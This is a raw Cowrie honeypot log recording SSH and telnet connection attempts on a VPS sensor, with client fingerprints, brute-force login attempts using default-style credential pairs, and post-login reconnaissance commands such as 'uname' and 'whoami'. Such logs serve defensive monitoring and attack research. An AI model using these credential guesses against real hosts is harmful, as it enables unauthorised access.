{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:56:07.281784Z","src_ip":"212.227.125.160","session":"00cf18a1ae27"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:56:07.282628Z","src_ip":"212.227.125.160","session":"00cf18a1ae27"}
{"eventid":"cowrie.session.closed","duration":13.39485216140747,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:56:07.523350Z","src_ip":"212.227.125.160","session":"d462f9a906f3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58911,"dst_ip":"1.2.3.4","dst_port":23,"session":"d80042e14ba6","protocol":"telnet","message":"New connection: 212.227.125.160:58911 (1.2.3.4:23) [session: d80042e14ba6]","sensor":"my-vps","timestamp":"2025-08-31T03:56:07.687554Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:56:07.780570Z","src_ip":"212.227.235.229","session":"47c01d3c2277"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:56:07.781520Z","src_ip":"212.227.235.229","session":"47c01d3c2277"}
{"eventid":"cowrie.session.closed","duration":13.812459468841553,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:56:08.399705Z","src_ip":"212.227.125.160","session":"be38dd67f730"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58915,"dst_ip":"1.2.3.4","dst_port":23,"session":"5eabc2f0c1fa","protocol":"telnet","message":"New connection: 212.227.125.160:58915 (1.2.3.4:23) [session: 5eabc2f0c1fa]","sensor":"my-vps","timestamp":"2025-08-31T03:56:08.629411Z"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":54968,"dst_ip":"1.2.3.4","dst_port":22,"session":"73f85e606ebe","protocol":"ssh","message":"New connection: 217.72.205.35:54968 (1.2.3.4:22) [session: 73f85e606ebe]","sensor":"my-vps","timestamp":"2025-08-31T03:56:13.952335Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:56:13.953596Z","src_ip":"217.72.205.35","session":"73f85e606ebe"}
{"eventid":"cowrie.session.closed","duration":12.900038957595825,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:56:16.585504Z","src_ip":"182.119.206.115","session":"27fa00181cd5"}
{"eventid":"cowrie.session.connect","src_ip":"182.119.206.115","src_port":53045,"dst_ip":"1.2.3.4","dst_port":23,"session":"0297bdd8fe58","protocol":"telnet","message":"New connection: 182.119.206.115:53045 (1.2.3.4:23) [session: 0297bdd8fe58]","sensor":"my-vps","timestamp":"2025-08-31T03:56:16.790746Z"}
{"eventid":"cowrie.session.closed","duration":13.587352275848389,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:56:19.323453Z","src_ip":"212.227.125.160","session":"d6768ab87749"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59090,"dst_ip":"1.2.3.4","dst_port":23,"session":"8f60f8e0f51f","protocol":"telnet","message":"New connection: 212.227.125.160:59090 (1.2.3.4:23) [session: 8f60f8e0f51f]","sensor":"my-vps","timestamp":"2025-08-31T03:56:19.589870Z"}
{"eventid":"cowrie.session.closed","duration":13.859822750091553,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:56:21.547305Z","src_ip":"212.227.125.160","session":"d80042e14ba6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59106,"dst_ip":"1.2.3.4","dst_port":23,"session":"b99cc5bdb8fa","protocol":"telnet","message":"New connection: 212.227.125.160:59106 (1.2.3.4:23) [session: b99cc5bdb8fa]","sensor":"my-vps","timestamp":"2025-08-31T03:56:21.753462Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:56:22.158559Z","src_ip":"212.227.235.229","session":"e5a7be02a859"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T03:56:22.159399Z","src_ip":"212.227.235.229","session":"e5a7be02a859"}
{"eventid":"cowrie.session.closed","duration":14.0931236743927,"message":"Connection lost after 14 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:56:22.722466Z","src_ip":"212.227.125.160","session":"5eabc2f0c1fa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59116,"dst_ip":"1.2.3.4","dst_port":23,"session":"269108a9bc9d","protocol":"telnet","message":"New connection: 212.227.125.160:59116 (1.2.3.4:23) [session: 269108a9bc9d]","sensor":"my-vps","timestamp":"2025-08-31T03:56:23.025418Z"}
{"eventid":"cowrie.session.closed","duration":12.77254319190979,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:56:29.563176Z","src_ip":"182.119.206.115","session":"0297bdd8fe58"}
{"eventid":"cowrie.session.connect","src_ip":"182.119.206.115","src_port":53365,"dst_ip":"1.2.3.4","dst_port":23,"session":"518bd57bf5ad","protocol":"telnet","message":"New connection: 182.119.206.115:53365 (1.2.3.4:23) [session: 518bd57bf5ad]","sensor":"my-vps","timestamp":"2025-08-31T03:56:29.780124Z"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"8.4","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 8.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:56:30.570807Z","src_ip":"212.227.235.229","session":"e5a7be02a859"}
{"eventid":"cowrie.session.closed","duration":"96.4","message":"Connection lost after 96.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:56:30.656809Z","src_ip":"212.227.235.229","session":"e5a7be02a859"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56968,"dst_ip":"1.2.3.4","dst_port":22,"session":"c555ea1850d3","protocol":"ssh","message":"New connection: 212.227.235.229:56968 (1.2.3.4:22) [session: c555ea1850d3]","sensor":"my-vps","timestamp":"2025-08-31T03:56:31.551115Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:56:31.552045Z","src_ip":"212.227.235.229","session":"c555ea1850d3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T03:56:31.883611Z","src_ip":"212.227.235.229","session":"c555ea1850d3"}
{"eventid":"cowrie.login.failed","username":"software","password":"software","message":"login attempt [software/software] failed","sensor":"my-vps","timestamp":"2025-08-31T03:56:33.503037Z","src_ip":"212.227.235.229","session":"c555ea1850d3"}
{"eventid":"cowrie.session.closed","duration":14.086704015731812,"message":"Connection lost after 14 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:56:33.676504Z","src_ip":"212.227.125.160","session":"8f60f8e0f51f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59301,"dst_ip":"1.2.3.4","dst_port":23,"session":"c7c74bcc7bfa","protocol":"telnet","message":"New connection: 212.227.125.160:59301 (1.2.3.4:23) [session: c7c74bcc7bfa]","sensor":"my-vps","timestamp":"2025-08-31T03:56:33.812427Z"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:56:34.836341Z","src_ip":"212.227.235.229","session":"c555ea1850d3"}
{"eventid":"cowrie.session.closed","duration":14.199475526809692,"message":"Connection lost after 14 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:56:35.952865Z","src_ip":"212.227.125.160","session":"b99cc5bdb8fa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59317,"dst_ip":"1.2.3.4","dst_port":23,"session":"f6b5dad3e357","protocol":"telnet","message":"New connection: 212.227.125.160:59317 (1.2.3.4:23) [session: f6b5dad3e357]","sensor":"my-vps","timestamp":"2025-08-31T03:56:36.192766Z"}
{"eventid":"cowrie.session.closed","duration":13.54011583328247,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:56:36.565462Z","src_ip":"212.227.125.160","session":"269108a9bc9d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59318,"dst_ip":"1.2.3.4","dst_port":23,"session":"479427d6d470","protocol":"telnet","message":"New connection: 212.227.125.160:59318 (1.2.3.4:23) [session: 479427d6d470]","sensor":"my-vps","timestamp":"2025-08-31T03:56:36.761368Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46786,"dst_ip":"1.2.3.4","dst_port":22,"session":"3f6f7b28e01d","protocol":"ssh","message":"New connection: 212.227.235.229:46786 (1.2.3.4:22) [session: 3f6f7b28e01d]","sensor":"my-vps","timestamp":"2025-08-31T03:56:40.997443Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34768,"dst_ip":"1.2.3.4","dst_port":22,"session":"46350e45a6a6","protocol":"ssh","message":"New connection: 212.227.125.160:34768 (1.2.3.4:22) [session: 46350e45a6a6]","sensor":"my-vps","timestamp":"2025-08-31T03:56:41.092990Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:56:41.753779Z","src_ip":"212.227.235.229","session":"3f6f7b28e01d"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:56:41.754774Z","src_ip":"212.227.235.229","session":"3f6f7b28e01d"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:56:41.861149Z","src_ip":"212.227.125.160","session":"46350e45a6a6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:56:41.861858Z","src_ip":"212.227.125.160","session":"46350e45a6a6"}
{"eventid":"cowrie.session.closed","duration":12.772173881530762,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:56:42.552229Z","src_ip":"182.119.206.115","session":"518bd57bf5ad"}
{"eventid":"cowrie.session.connect","src_ip":"182.119.206.115","src_port":53669,"dst_ip":"1.2.3.4","dst_port":23,"session":"37388169f929","protocol":"telnet","message":"New connection: 182.119.206.115:53669 (1.2.3.4:23) [session: 37388169f929]","sensor":"my-vps","timestamp":"2025-08-31T03:56:42.826653Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42332,"dst_ip":"1.2.3.4","dst_port":22,"session":"660eddac5889","protocol":"ssh","message":"New connection: 212.227.125.160:42332 (1.2.3.4:22) [session: 660eddac5889]","sensor":"my-vps","timestamp":"2025-08-31T03:56:46.155755Z"}
{"eventid":"cowrie.login.success","username":"root","password":"669703da61","message":"login attempt [root/669703da61] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:56:47.381324Z","src_ip":"212.227.125.160","session":"46350e45a6a6"}
{"eventid":"cowrie.session.closed","duration":13.851775884628296,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:56:47.664128Z","src_ip":"212.227.125.160","session":"c7c74bcc7bfa"}
{"eventid":"cowrie.login.failed","username":"master","password":"P@ssw0rd123","message":"login attempt [master/P@ssw0rd123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:56:48.062048Z","src_ip":"212.227.235.229","session":"3f6f7b28e01d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59506,"dst_ip":"1.2.3.4","dst_port":23,"session":"eaa33e3b5511","protocol":"telnet","message":"New connection: 212.227.125.160:59506 (1.2.3.4:23) [session: eaa33e3b5511]","sensor":"my-vps","timestamp":"2025-08-31T03:56:48.887123Z"}
{"eventid":"cowrie.session.closed","duration":13.210150718688965,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:56:49.402845Z","src_ip":"212.227.125.160","session":"f6b5dad3e357"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59529,"dst_ip":"1.2.3.4","dst_port":23,"session":"4680cf78caaf","protocol":"telnet","message":"New connection: 212.227.125.160:59529 (1.2.3.4:23) [session: 4680cf78caaf]","sensor":"my-vps","timestamp":"2025-08-31T03:56:49.691478Z"}
{"eventid":"cowrie.session.closed","duration":"9.0","message":"Connection lost after 9.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:56:49.989230Z","src_ip":"212.227.235.229","session":"3f6f7b28e01d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:56:50.449932Z","src_ip":"212.227.125.160","session":"46350e45a6a6"}
{"eventid":"cowrie.command.input","input":"whoami","message":"CMD: whoami","sensor":"my-vps","timestamp":"2025-08-31T03:56:50.450687Z","src_ip":"212.227.125.160","session":"46350e45a6a6"}
{"eventid":"cowrie.session.closed","duration":13.927762746810913,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:56:50.689061Z","src_ip":"212.227.125.160","session":"479427d6d470"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59609,"dst_ip":"1.2.3.4","dst_port":23,"session":"54ac23f2263d","protocol":"telnet","message":"New connection: 212.227.125.160:59609 (1.2.3.4:23) [session: 54ac23f2263d]","sensor":"my-vps","timestamp":"2025-08-31T03:56:50.897729Z"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","size":5,"shasum":"f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","duplicate":true,"duration":"1.6","message":"Closing TTY Log: var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1 after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:56:52.049111Z","src_ip":"212.227.125.160","session":"46350e45a6a6"}
{"eventid":"cowrie.session.closed","duration":"11.0","message":"Connection lost after 11.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:56:52.050249Z","src_ip":"212.227.125.160","session":"46350e45a6a6"}
{"eventid":"cowrie.session.closed","duration":12.749650001525879,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:56:55.576231Z","src_ip":"182.119.206.115","session":"37388169f929"}
{"eventid":"cowrie.session.connect","src_ip":"182.119.206.115","src_port":53986,"dst_ip":"1.2.3.4","dst_port":23,"session":"0293aa81ad0c","protocol":"telnet","message":"New connection: 182.119.206.115:53986 (1.2.3.4:23) [session: 0293aa81ad0c]","sensor":"my-vps","timestamp":"2025-08-31T03:56:55.751487Z"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"ubuntu","message":"login attempt [ubuntu/ubuntu] failed","sensor":"my-vps","timestamp":"2025-08-31T03:56:56.147098Z","src_ip":"212.227.235.229","session":"47c01d3c2277"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:56:59.778182Z","src_ip":"212.227.125.160","session":"660eddac5889"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:56:59.779466Z","src_ip":"212.227.125.160","session":"660eddac5889"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":50192,"dst_ip":"1.2.3.4","dst_port":22,"session":"d05ca32473ed","protocol":"ssh","message":"New connection: 201.148.180.50:50192 (1.2.3.4:22) [session: d05ca32473ed]","sensor":"my-vps","timestamp":"2025-08-31T03:57:00.575150Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:57:01.482604Z","src_ip":"201.148.180.50","session":"d05ca32473ed"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:57:01.483344Z","src_ip":"201.148.180.50","session":"d05ca32473ed"}
{"eventid":"cowrie.session.closed","duration":13.809863090515137,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:57:02.696911Z","src_ip":"212.227.125.160","session":"eaa33e3b5511"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37032,"dst_ip":"1.2.3.4","dst_port":22,"session":"76c9a9a8475e","protocol":"ssh","message":"New connection: 212.227.125.160:37032 (1.2.3.4:22) [session: 76c9a9a8475e]","sensor":"my-vps","timestamp":"2025-08-31T03:57:02.740230Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59851,"dst_ip":"1.2.3.4","dst_port":23,"session":"78ad9fe43d5e","protocol":"telnet","message":"New connection: 212.227.125.160:59851 (1.2.3.4:23) [session: 78ad9fe43d5e]","sensor":"my-vps","timestamp":"2025-08-31T03:57:02.898468Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:57:03.109047Z","src_ip":"212.227.125.160","session":"76c9a9a8475e"}
